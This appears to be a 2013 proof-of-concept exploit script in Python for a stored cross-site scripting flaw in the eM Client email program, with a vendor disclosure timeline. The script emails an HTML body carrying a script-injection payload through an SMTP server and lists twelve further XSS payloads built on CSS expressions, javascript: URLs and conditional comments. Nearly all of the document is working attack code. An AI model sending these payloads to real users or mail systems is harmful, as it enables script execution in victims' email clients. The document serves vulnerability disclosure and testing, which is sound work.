103 lines
No EOL
3.5 KiB
Python
Executable file
103 lines
No EOL
3.5 KiB
Python
Executable file
#!/usr/bin/python
|
|
'''
|
|
|
|
Author: loneferret of Offensive Security
|
|
Date: 22-08-2013
|
|
Product: eM Client for Windows
|
|
Version: 5.0.18025.0 (previous versions and other platforms may be vulnerable)
|
|
Vendor Site: http://www.emclient.com/
|
|
Software Download: http://www.emclient.com/download
|
|
|
|
Tested on: Windows XP Pro SP3 Eng.
|
|
Tested on: Windows 7 Pro SP1 Eng.
|
|
eM Client: Using default settings
|
|
|
|
|
|
E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you
|
|
get an annoying alert box etc etc etc.
|
|
Injection Point: Body
|
|
|
|
Gave vendor 7 days to reply in order to co-ordinate a release date.
|
|
Timeline:
|
|
23 Aug 2013: Tentative release date 30 Aug 2013
|
|
23 Aug 2013: Vulnerability reported to vendor. Provided a list of payloads
|
|
26 Aug 2013: No response from vendor, sent a reminder email
|
|
27 Aug 2013: Vendor responded, will issue update to fix within 14 days
|
|
27 Aug 2013: Tentative release date pushed to September 10th 2013
|
|
27 Aug 2013: Replied to vendor with new date
|
|
09 Sep 2013: Contacted vendor with remainder of release date
|
|
09 Sep 2013: Vendor responded with go ahead with release
|
|
10 Sep 2013: Public release
|
|
|
|
Solution: Upgrade/update to latest version (haven't tested yet)
|
|
|
|
'''
|
|
|
|
import smtplib, urllib2
|
|
|
|
payload = '''<DIV STYLE="background-image: url(javascript:alert('XSS'))">'''
|
|
|
|
def sendMail(dstemail, frmemail, smtpsrv, username, password):
|
|
msg = "From: hacker@offsec.local\n"
|
|
msg += "To: victim@offsec.local\n"
|
|
msg += 'Date: Today\r\n'
|
|
msg += "Subject: XSS payload\n"
|
|
msg += "Content-type: text/html\n\n"
|
|
msg += payload + "\r\n\r\n"
|
|
server = smtplib.SMTP(smtpsrv)
|
|
server.login(username,password)
|
|
try:
|
|
server.sendmail(frmemail, dstemail, msg)
|
|
except Exception, e:
|
|
print "[-] Failed to send email:"
|
|
print "[*] " + str(e)
|
|
server.quit()
|
|
|
|
username = "test@test.com"
|
|
password = "123456"
|
|
dstemail = "test@test.com"
|
|
frmemail = "hacker@offsec.local"
|
|
smtpsrv = "172.16.61.165"
|
|
|
|
print "[*] Sending Email"
|
|
sendMail(dstemail, frmemail, smtpsrv, username, password)
|
|
|
|
'''
|
|
# Payloads
|
|
[+] Payload 1 : DIV background-image 1
|
|
[+] Code for 1 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
------------
|
|
[+] Payload 2 : DIV background-image 2
|
|
[+] Code for 2 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
------------
|
|
[+] Payload 3 : DIV expression
|
|
[+] Code for 3 : <DIV STYLE="width: expression(alert('XSS'));">
|
|
------------
|
|
[+] Payload 4 : IMG STYLE w/expression
|
|
[+] Code for 4 : exp/*<XSS STYLE='no\xss:noxss("*//*");
|
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
------------
|
|
[+] Payload 5 : List-style-image
|
|
[+] Code for 5 : <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
|
------------
|
|
[+] Payload 6 : STYLE w/Comment
|
|
[+] Code for 6 : <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
------------
|
|
[+] Payload 7 : STYLE w/Anonymous HTML
|
|
[+] Code for 7 : <XSS STYLE="xss:expression(alert('XSS'))">
|
|
------------
|
|
[+] Payload 8 : STYLE w/background-image
|
|
[+] Code for 8 : <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
------------
|
|
[+] Payload 9 : TABLE
|
|
[+] Code for 9 : <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
|
------------
|
|
[+] Payload 10 : TD
|
|
[+] Code for 11 : <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
|
------------
|
|
[+] Payload 12 : Commented-out Block
|
|
[+] Code for 12 : <!--[if gte IE 4]>
|
|
<SCRIPT>alert('XSS');</SCRIPT>
|
|
<![endif]-->
|
|
----
|
|
''' |